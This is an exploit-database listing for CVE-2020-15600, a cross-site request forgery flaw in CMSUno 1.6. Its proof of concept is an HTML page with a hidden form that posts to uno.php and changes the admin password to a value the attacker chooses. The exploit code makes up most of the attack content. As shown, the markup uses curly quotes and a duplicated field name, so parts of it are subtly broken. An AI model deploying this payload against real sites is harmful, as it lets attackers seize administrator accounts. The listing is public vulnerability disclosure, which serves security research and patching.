Lucene search
Noth1337DAY-ID-34698HistoryJul 17, 2020 - 12:00 a.m.
CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password) Vulnerability
2020-07-1700:00:00
noth
0day.today
451
0.001 Low
EPSS
Percentile
41.2%
Exploit for php platform in category web applications
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600
An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.
PoC :
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”>
<input type=“hidden” name=“user” value=“admin”/>
<input type=“hidden” name=“pass” value=“yourpassword”/>
<input type=“submit” name=“user” value=“Submit request”/>
</form>
</body>
</html>
# 0day.today [2020-07-19] #Related
cve
cve
CVE-2020-15600
2020-07-07 22:15:10
prion
prion
Cross site request forgery (csrf)
2020-07-07 22:15:00
nvd
nvd
CVE-2020-15600
2020-07-07 22:15:10
packetstorm
packetstorm
CMSUno 1.6 Cross Site Request Forgery
2020-07-17 00:00:00
osv
osv
CVE-2020-15600
2020-07-07 22:15:10
cvelist
cvelist
CVE-2020-15600
2020-07-07 21:17:06